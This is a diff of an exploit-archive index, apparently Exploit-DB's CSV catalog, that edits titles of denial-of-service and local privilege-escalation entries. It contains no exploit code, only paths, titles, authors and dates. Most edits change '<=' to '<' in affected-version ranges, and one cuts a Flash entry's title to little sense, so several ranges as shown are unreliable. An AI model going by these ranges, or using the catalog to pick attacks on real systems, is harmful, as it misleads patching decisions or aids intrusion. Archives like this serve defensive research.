+8644,platforms/windows/dos/8644.pl,"ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet - Denial of Service",2009-05-08,ikki,multiple,dos,0
 8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
@ -1236,7 +1236,7 @@ id,file,description,date,author,platform,type,port
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0
 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
-10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
+10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
@ -4755,7 +4755,7 @@ id,file,description,date,author,platform,type,port
 38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0
-38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector.<uint> Capacity Field",2015-09-28,"Google Security Research",windows,dos,0
+38348,platforms/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",windows,dos,0
 38364,platforms/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
 38365,platforms/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0
 38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",linux,dos,0
@ -5665,14 +5665,14 @@ id,file,description,date,author,platform,type,port
 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0
 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0
 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",windows,local,0
-2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
-2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0
-2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
-2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
+2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
+2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0
+2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
+2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
 2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Privilege Escalation",2006-07-15,h00lyshit,linux,local,0
 2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
 2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
-2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
+2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
 2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
 2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0
@ -5691,11 +5691,11 @@ id,file,description,date,author,platform,type,port
 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0
 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0
 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow",2006-09-01,bratax,windows,local,0
-2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0
-2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0
-2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0
+2330,platforms/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0
+2331,platforms/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0
+2332,platforms/sco/local/2332.c,"X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0
 2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow",2006-09-09,Qnix,linux,local,0
-2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",solaris,local,0
+2360,platforms/solaris/local/2360.c,"X11R6 < 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (2)",2006-09-13,"Marco Ivaldi",solaris,local,0
 2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - (LHA long Directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0
 2412,platforms/windows/local/2412.c,"Microsoft Windows Kernel - Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0
 2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0
@ -5720,7 +5720,7 @@ id,file,description,date,author,platform,type,port
 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0
 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
-2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0
+2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0
 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0
 2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0
 3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0
@ -5882,12 +5882,12 @@ id,file,description,date,author,platform,type,port
 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0
 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local,0
-5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Privilege Escalation (2)",2008-02-09,qaaz,linux,local,0
-5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Privilege Escalation (1)",2008-02-09,qaaz,linux,local,0
+5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Privilege Escalation (2)",2008-02-09,qaaz,linux,local,0
+5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Privilege Escalation (1)",2008-02-09,qaaz,linux,local,0
 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
-5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0
-5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0
-5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0
+5141,platforms/windows/local/5141.c,"DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0
+5143,platforms/windows/local/5143.c,"DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0
+5144,platforms/windows/local/5144.c,"DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0
 5167,platforms/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition",2008-02-21,vl4dZ,linux,local,0
 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0
 5250,platforms/windows/local/5250.cpp,"VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0
@ -6041,7 +6041,7 @@ id,file,description,date,author,platform,type,port
 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0
 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Privilege Escalation",2009-03-29,"Jon Oberheide",linux,local,0
 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,local,0
-8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
+8312,platforms/windows/local/8312.py,"AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0
 8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,windows,local,0
 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Privilege Escalation",2009-04-08,gat3way,linux,local,0
@ -6316,7 +6316,7 @@ id,file,description,date,author,platform,type,port
 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local,0
 10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed '.m3u' Universal XP Buffer Overflow (SEH)",2009-12-22,"ThE g0bL!N",windows,local,0
 10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Exploit",2009-12-22,d3b4g,windows,local,0
-10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18 <= 2.6.18-20 - Privilege Escalation",2009-12-23,DigitALL,linux,local,0
+10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18 < 2.6.18-20 - Privilege Escalation",2009-12-23,DigitALL,linux,local,0
 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat - Exploit",2009-12-23,"Ahmed Obied",windows,local,0
 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,windows,local,0
 10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Buffer Overflow",2009-12-23,dijital1,windows,local,0
@ -6343,7 +6343,7 @@ id,file,description,date,author,platform,type,port
 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
-11139,platforms/windows/local/11139.c,"Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
+11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow",2010-01-16,Dz_attacker,windows,local,0
@ -6642,10 +6642,10 @@ id,file,description,date,author,platform,type,port
 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",windows,local,0
 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0
 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0
-15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 <= 1.2.0.4 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
-15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
-15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
-15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
+15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 < 1.2.0.4 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
+15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 < 2010.5.11.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
+15763,platforms/windows/local/15763.txt,"ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
+15764,platforms/windows/local/15764.txt,"ViRobot Desktop 5.5 and Server 3.5 < 2008.8.1.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0
 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0
 15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional - Buffer Overflow (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0
@ -6682,7 +6682,7 @@ id,file,description,date,author,platform,type,port
 16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0
 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
-16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0
+16138,platforms/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0
 16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0
 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0
 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local,0
@ -6865,7 +6865,7 @@ id,file,description,date,author,platform,type,port
 17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0
 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0
 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0
-17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
+17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0
@ -6904,7 +6904,7 @@ id,file,description,date,author,platform,type,port
 18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
-18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
+18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
 18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
@ -7251,7 +7251,7 @@ id,file,description,date,author,platform,type,port
 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0
 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0
 19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0
-19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0
+19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0
 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0
 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
 19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
@ -7944,7 +7944,7 @@ id,file,description,date,author,platform,type,port
 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Privilege Escalation",2013-05-13,HTP,linux,local,0
 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0
 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0
-25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0
+25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0
 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - ERS File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local,0
 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
@ -8222,7 +8222,7 @@ id,file,description,date,author,platform,type,port
 33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
 33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
-33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
+33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local,0
 33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0
 33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Privilege Escalation (3)",2013-02-24,SynQ,linux,local,0
@ -8231,7 +8231,7 @@ id,file,description,date,author,platform,type,port
 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
 40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
-33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
+33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
 33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
@ -8289,7 +8289,7 @@ id,file,description,date,author,platform,type,port
 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
 35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
-35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
+35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
